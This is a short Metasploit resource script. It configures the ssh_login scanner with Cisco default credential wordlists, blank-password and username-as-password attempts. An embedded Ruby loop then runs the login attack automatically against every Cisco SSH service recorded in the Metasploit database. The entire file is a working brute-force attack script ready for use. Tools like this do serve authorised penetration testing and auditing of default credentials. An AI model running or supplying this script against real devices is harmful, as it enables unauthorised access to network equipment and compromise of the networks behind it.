use auxiliary/scanner/ssh/ssh_login
set USER_FILE /opt/metasploit/apps/pro/data/wordlists/telnet_cisco_default_user.txt
set PASS_FILE /opt/metasploit/apps/pro/data/wordlists/telnet_cisco_default_pass.txt
set BLANK_PASSWORDS true
set USER_AS_PASS true
set VERBOSE false 

<ruby>
framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.info =~ /cisco/i && service.name == "ssh"
      self.run_single("set RHOSTS #{host.address}")
      self.run_single("set RPORT #{service.port}")
      self.run_single("run")
    end
  end
end
</ruby>
